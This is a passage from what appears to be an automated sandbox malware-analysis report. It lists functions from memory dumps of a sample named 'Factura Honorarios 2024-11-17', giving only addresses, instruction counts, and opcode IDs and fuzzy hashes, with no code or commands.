                                                                                                                                  • Opcode Fuzzy Hash: 0b076ab19a965c144210f768512b02e55bb198e3ddef30c956798078d8d9bb89
                                                                                                                                  • Instruction Fuzzy Hash: 3D520D34A00218CFEB15DBA4C860B9EBB77EF88700F1080A9D51A7B7A5CF355E85AF51
                                                                                                                                  Function 0015E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 05c30ffffa16cf437f5081b4d529b9fc1ef1c8134e174403292e69f3eb8028b1
                                                                                                                                  • Instruction ID: 019ca5273aed23b6765a3d056e3c24a1260b9ac2dca9f9ce7f496d7a0ea9ff55
                                                                                                                                  • Opcode Fuzzy Hash: 05c30ffffa16cf437f5081b4d529b9fc1ef1c8134e174403292e69f3eb8028b1
                                                                                                                                  • Instruction Fuzzy Hash: A3129835065646CFA2502B70EDAC12BBBF1FB1F32B7546CA8F10FC58659B7144C9CA62
                                                                                                                                  Function 00150CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 42a6cc9bf485c3b183a0d8c05706f3ffb10a0a447f8b7264268b0626858d2706
                                                                                                                                  • Instruction ID: 51717c5b723abdccfef7a6ea750c83d6e7482e5fc3f4ee0331514f424c6c5d15
                                                                                                                                  • Opcode Fuzzy Hash: 42a6cc9bf485c3b183a0d8c05706f3ffb10a0a447f8b7264268b0626858d2706
                                                                                                                                  • Instruction Fuzzy Hash: B7521C74A00719CFDB54DF68DD94A8DBBB2FB89301F1042A9D609A7365DB306E86CF81
                                                                                                                                  Function 001576F1 Relevance: .5, Instructions: 475COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86e93b24646254185766855ce24606b941dfd8207284c792421dc8e06064f4d9
                                                                                                                                  • Instruction ID: a30c75add678029ebfa438dc687ae25521314005c9c7ca5ab6f828b745634b6d
                                                                                                                                  • Opcode Fuzzy Hash: 86e93b24646254185766855ce24606b941dfd8207284c792421dc8e06064f4d9
                                                                                                                                  • Instruction Fuzzy Hash: 04126C30A04205CFCB15CF68E985AAEBBF1FF89315F158599E829DB2A1D730ED45CB50
                                                                                                                                  Function 38F83FE8 Relevance: .4, Instructions: 396COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7ae80e8b477d045e6fbb61dcfbb1532d305f2867f54118e132eac43c69c7047a
                                                                                                                                  • Instruction ID: 8c171c1c6ed8ec035e8f1039575f4b984875b53fc61375f165f4923821b35e4d
                                                                                                                                  • Opcode Fuzzy Hash: 7ae80e8b477d045e6fbb61dcfbb1532d305f2867f54118e132eac43c69c7047a
                                                                                                                                  • Instruction Fuzzy Hash: 90D1C075B046048FDB05DB68C890A9E7BB2FFC9320F1545AAE505EB3A2DB31DD41CBA1
                                                                                                                                  Function 00155F38 Relevance: .3, Instructions: 327COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5006d962fbcc95897af7f160ebd11f66d3dd7abfb0a2c158067ba162185ec913
                                                                                                                                  • Instruction ID: d38294895e27078f83edd5a97979406018a00e40d17a18230f1f56da08109801
                                                                                                                                  • Opcode Fuzzy Hash: 5006d962fbcc95897af7f160ebd11f66d3dd7abfb0a2c158067ba162185ec913
                                                                                                                                  • Instruction Fuzzy Hash: 7EB19C30708211CFDB159B24C894B7E7BB6AFC9302F54856AE816CB3A1DB34CC8AD791
                                                                                                                                  Function 3920E950 Relevance: .2, Instructions: 239COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 009d6f887f20fb4b1dbd0f113bf669585eef18ed369326a4bf787fc7aa6d0fcc
                                                                                                                                  • Instruction ID: 47ae8fd56a98b6feb3060b4d41d61e8d736dd2632be3543d42a9ef23be7558d6
                                                                                                                                  • Opcode Fuzzy Hash: 009d6f887f20fb4b1dbd0f113bf669585eef18ed369326a4bf787fc7aa6d0fcc
                                                                                                                                  • Instruction Fuzzy Hash: 8C81CF34B10606CFD704DF78C9A4A5E7BF2BF89640B1581A9E506DB3A1EA31EC42CF91
                                                                                                                                  Function 00156498 Relevance: .2, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d63224a5bb4b25ee57240fe78722ae39dd9663921a2f1365c5324d74967a1d80
                                                                                                                                  • Instruction ID: a4045f33b0276e9f94b6d2496a77726fe04789d2f4dde31e666d67ad34223661
                                                                                                                                  • Opcode Fuzzy Hash: d63224a5bb4b25ee57240fe78722ae39dd9663921a2f1365c5324d74967a1d80
                                                                                                                                  • Instruction Fuzzy Hash: 1E81A030A00505CFDB58CF69C484969BBB2FF89312BA58169D825EF365DB31EC49CBE1
                                                                                                                                  Function 38F84A68 Relevance: .2, Instructions: 212COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dd0a2ac89056eecb50c5e638f402408636eeb542a2e461bf8be34c5dc67329bb
                                                                                                                                  • Instruction ID: 88a0ea420d594526a6207ff031fac119b886db9b104a59e03d3eb9fc0f727b4a
                                                                                                                                  • Opcode Fuzzy Hash: dd0a2ac89056eecb50c5e638f402408636eeb542a2e461bf8be34c5dc67329bb
                                                                                                                                  • Instruction Fuzzy Hash: 7C61FEB6B047059FD7148BB8D840AAABBB9FFD5324B14896AE458C7760D7309901CBA0
                                                                                                                                  Function 001580D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cae7656a4fc1be91c282ae90d28ea6f71ceccbccb48966f04b8bca820eb78111
                                                                                                                                  • Instruction ID: 529bf3340f5ef710865eb22316093db51f05495760ff53cba16c16f4117459b1
                                                                                                                                  • Opcode Fuzzy Hash: cae7656a4fc1be91c282ae90d28ea6f71ceccbccb48966f04b8bca820eb78111
                                                                                                                                  • Instruction Fuzzy Hash: 1571F634700A05CFCB15DF68C884A6A7BE6AF99342F1540A9E826EF371DB70DC46CB50
                                                                                                                                  Function 3920D700 Relevance: .2, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 822ae7ac59f3aa357714d231a5e61326caf07ba63fd8a3f07ef29f2e78b8ebd3
                                                                                                                                  • Instruction ID: dd9dcad0b1ace233729b17a727dc608f4045fba3b9a541084e9262c4412faa94
                                                                                                                                  • Opcode Fuzzy Hash: 822ae7ac59f3aa357714d231a5e61326caf07ba63fd8a3f07ef29f2e78b8ebd3
                                                                                                                                  • Instruction Fuzzy Hash: BC819274E412688FDB65DF29DD51BDDBBB2BB89300F1081EAD949A7250DB305E81CF44
                                                                                                                                  Function 392121B8 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8096f57bde2ff8fceeebaf7aa1a199ef0f921b209f0f63a9d057fbca9a35ec27
                                                                                                                                  • Instruction ID: 6d5163a8a7638582309010dca8f5ece53d969cb54877fc5732c4da84fc0d825c
                                                                                                                                  • Opcode Fuzzy Hash: 8096f57bde2ff8fceeebaf7aa1a199ef0f921b209f0f63a9d057fbca9a35ec27
                                                                                                                                  • Instruction Fuzzy Hash: 37719E74E00218CFEB14DFA9C994A9DBBF2BF89300F648129D815BB355EB359942DF50
                                                                                                                                  Function 392181E8 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9810a6d7bf0f256cd6d0b554f044768d963c35a17da6fcb3300fab16dd2757a
                                                                                                                                  • Instruction ID: f44aa015c6e388c9629a8ddc25952575c6643583725ac9cace9bd1b0e46f8df0
                                                                                                                                  • Opcode Fuzzy Hash: d9810a6d7bf0f256cd6d0b554f044768d963c35a17da6fcb3300fab16dd2757a
                                                                                                                                  • Instruction Fuzzy Hash: D671B174E00208CFEB14DFA9C994A9DBBF2BF89300F64812AD815BB355EB359942DF54
                                                                                                                                  Function 392073E0 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: adf7f8ade9cf9e9e2c394419975929e26637d644574b0ffd1aacfbad84328bbb
                                                                                                                                  • Instruction ID: e1ea987864e3e64562a3c36191814814fe200633a7e49abe1fa5da46b08b4a10
                                                                                                                                  • Opcode Fuzzy Hash: adf7f8ade9cf9e9e2c394419975929e26637d644574b0ffd1aacfbad84328bbb
                                                                                                                                  • Instruction Fuzzy Hash: A471C074E00618CFEB15DFA9C994A9DBBB2FF89300F64812AD805BB354DB359942DF50
                                                                                                                                  Function 3920D410 Relevance: .2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cc23aacb4878314d69cc5d15103b485bdb34ff70168255a2ff31b2faea5a722b
                                                                                                                                  • Instruction ID: 2d9c9373983576d1e4ae251517312d8eae41c07773cd6971576f5ee79f18f80f
                                                                                                                                  • Opcode Fuzzy Hash: cc23aacb4878314d69cc5d15103b485bdb34ff70168255a2ff31b2faea5a722b
                                                                                                                                  • Instruction Fuzzy Hash: E771C075E00208CFEB14DFA9D990A9DBBF2BF89300F648129D814BB355DB35A942DF50
                                                                                                                                  Function 0015F71F Relevance: .2, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8e5c4eadd4de709581fa0532aaa97bed2f922e4d67a60032c467afc69d5fbc40
                                                                                                                                  • Instruction ID: 0388c5a062010c2b95296f79d19d97d09fdde7bf12234a1d638b8afebd9dee99
                                                                                                                                  • Opcode Fuzzy Hash: 8e5c4eadd4de709581fa0532aaa97bed2f922e4d67a60032c467afc69d5fbc40
                                                                                                                                  • Instruction Fuzzy Hash: 3761DF74D00318DFDB15DFA9C858BAEBBB2BF89301F208129D805BB294DB755A4ADF40
                                                                                                                                  Function 0015D548 Relevance: .1, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0ee3c834e7e2fa1fb435461eb3b5e572e9ab86a6b1d37300c81e594c56f955ce
                                                                                                                                  • Instruction ID: 9ed14b9535058d3b2130db1325b85f7829d0fa65208f5cc4458c79d18c9b60b2
                                                                                                                                  • Opcode Fuzzy Hash: 0ee3c834e7e2fa1fb435461eb3b5e572e9ab86a6b1d37300c81e594c56f955ce
                                                                                                                                  • Instruction Fuzzy Hash: 43519274E01208DFDB44DFAAD99499DBBF2BF89300F208169E819AB365DB31A905CF50
                                                                                                                                  Function 0015A303 Relevance: .1, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc4aa9fc93e65f235e2557145f96f479bfe3ee9093b5cc072e86f09a4fe6d021
                                                                                                                                  • Instruction ID: 63fc1aba72ac7025f4e4c632c029b37176c0c5ca959da48d1f717e94ebc7d141
                                                                                                                                  • Opcode Fuzzy Hash: dc4aa9fc93e65f235e2557145f96f479bfe3ee9093b5cc072e86f09a4fe6d021
                                                                                                                                  • Instruction Fuzzy Hash: A841EE31A44248CFCF11CFA4C848AADBFB2BF49316F048255E9259F2A1D370ED58CB62
                                                                                                                                  Function 3920FB37 Relevance: .1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: edcb3fe2775542afb6b41ab5dbfaa43662250692c28efda51ad38ee9063c0466
                                                                                                                                  • Instruction ID: 99ca90156714a6975ed7f38a0ba336ea6ffd84b4ab729af76404169dc4e266ca
                                                                                                                                  • Opcode Fuzzy Hash: edcb3fe2775542afb6b41ab5dbfaa43662250692c28efda51ad38ee9063c0466
                                                                                                                                  • Instruction Fuzzy Hash: A341DF78E04219CFDB14CFA8D5557EDBBF2AB49300F14956AD805B7290DB38694ACF50
                                                                                                                                  Function 38F84790 Relevance: .1, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: af814ce7526be0fa80ac13bca914d4f4c3670c4ed9796a7c6163bf0d8fa33b89
                                                                                                                                  • Instruction ID: 06d86264f210f65a8bce0a4ee8be6b6249b6bfbd6a88446b72af5b7bb42616e5
                                                                                                                                  • Opcode Fuzzy Hash: af814ce7526be0fa80ac13bca914d4f4c3670c4ed9796a7c6163bf0d8fa33b89
                                                                                                                                  • Instruction Fuzzy Hash: E931E931B042449FDB45DBB9D8556AE7BB6EFC9300F1084BDD509DB252DB308D02C7A0
                                                                                                                                  Function 3920FB48 Relevance: .1, Instructions: 111COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 37d87c3959911e1ae90ff6aa2b1579cf07504e8f9fadab0dbd28e33d6db158fa
                                                                                                                                  • Instruction ID: f9ee86baf8cb451e85cebece25abaf1432b61f28129294e18dbf8ac552a00d96
                                                                                                                                  • Opcode Fuzzy Hash: 37d87c3959911e1ae90ff6aa2b1579cf07504e8f9fadab0dbd28e33d6db158fa
                                                                                                                                  • Instruction Fuzzy Hash: 6941AF74E00219CFDB14CFA9D5997EDBBF2AB49300F14912AD815B7354EB386946CF90
                                                                                                                                  Function 00159C30 Relevance: .1, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 305710afda85243a42e3648934a537d8c32241002c14d45848018357aacc34af
                                                                                                                                  • Instruction ID: 2a5b21ea087113bedf8508853b51f461405c81b7912fa75f2ddcae80df151598
                                                                                                                                  • Opcode Fuzzy Hash: 305710afda85243a42e3648934a537d8c32241002c14d45848018357aacc34af
                                                                                                                                  • Instruction Fuzzy Hash: 4C419E30600245CFDB01DF68C844B6A7BF6EF89316F148466E928CF265D771DC45CBA2
                                                                                                                                  Function 3920E588 Relevance: .1, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0e2afb40a623d2aa28d792719d04295efa7123477881b6cb0d427fcf19b72a91
                                                                                                                                  • Instruction ID: 89651f358a2fd93b085a8eb225f5ee93f6c9aab8d4c0ab9101988a55c930f1dd
                                                                                                                                  • Opcode Fuzzy Hash: 0e2afb40a623d2aa28d792719d04295efa7123477881b6cb0d427fcf19b72a91
                                                                                                                                  • Instruction Fuzzy Hash: 9B319E76B046928FDB16CB34A9A045E7F72AF4224070805A7D5A8DB791DB20DCC1CFD1
                                                                                                                                  Function 38F84351 Relevance: .1, Instructions: 101COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 296915a7f0b926975716c8ff4498b8bbe2bdf2fb1080cde6a757236aca52963e
                                                                                                                                  • Instruction ID: 88f3f292f0399174488e469a01f380a98efbe67224f28df6cc465afb305afc8f
                                                                                                                                  • Opcode Fuzzy Hash: 296915a7f0b926975716c8ff4498b8bbe2bdf2fb1080cde6a757236aca52963e
                                                                                                                                  • Instruction Fuzzy Hash: 1D312575B002088FDB45DBA8C480E9DBBB2BF88720F195584E905EF361DB31ED45CBA1
                                                                                                                                  Function 00155658 Relevance: .1, Instructions: 101COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7eb9847f0f49fae045b8f968b83141108e1d2dc6e07b78ac5ed72bc5c5993f07
                                                                                                                                  • Instruction ID: 3ae4532a11dff1ef989652597da88e4a463a198fc7d870e6b5f6017689514f1b
                                                                                                                                  • Opcode Fuzzy Hash: 7eb9847f0f49fae045b8f968b83141108e1d2dc6e07b78ac5ed72bc5c5993f07
                                                                                                                                  • Instruction Fuzzy Hash: 1A31A131204149DFCF059F64D9A4AAE3BB3EF88301F508024FD299B255CB35DEA6DBA1
                                                                                                                                  Function 38F84385 Relevance: .1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f5d5f8001ec236f1816a3f54a57668793d7098d909593b534e623fd4305385d
                                                                                                                                  • Instruction ID: 4b074a951a87d21f791473fded24c95b157880acc0c71f85b2da49f80852d106
                                                                                                                                  • Opcode Fuzzy Hash: 0f5d5f8001ec236f1816a3f54a57668793d7098d909593b534e623fd4305385d
                                                                                                                                  • Instruction Fuzzy Hash: 47312575B002088FDB45EBA8C480E9DBBB2BF88720F195594E905AF361DB71ED45CBA1
                                                                                                                                  Function 39218780 Relevance: .1, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f235b0a5b5e208882916ac7071ecd4f8e1c68a26cb3f24e63f3ed1ca8c7f337c
                                                                                                                                  • Instruction ID: a76f7acf700676876bdc509adbff226f7046e60ef3b0bfc890fbb212543af7c7
                                                                                                                                  • Opcode Fuzzy Hash: f235b0a5b5e208882916ac7071ecd4f8e1c68a26cb3f24e63f3ed1ca8c7f337c
                                                                                                                                  • Instruction Fuzzy Hash: 3741E574E00658CBDB14CFBAD8506DDBBF2AF89300F54C16AC818BB254EB795912CF50
                                                                                                                                  Function 392073D0 Relevance: .1, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 988ada570c7b3e68cc620671302378ed2929ce9498d1408b22c70230e8aa7ced
                                                                                                                                  • Instruction ID: 66e6f54790c9b96400eca9e6582d96047a14899a2bacf6f0525e043310105c03
                                                                                                                                  • Opcode Fuzzy Hash: 988ada570c7b3e68cc620671302378ed2929ce9498d1408b22c70230e8aa7ced
                                                                                                                                  • Instruction Fuzzy Hash: 7A312774E006488FDB05CFBAD9506DDBBF2AF8A300F24846AC418BB365EB355A06CF54
                                                                                                                                  Function 3920D401 Relevance: .1, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
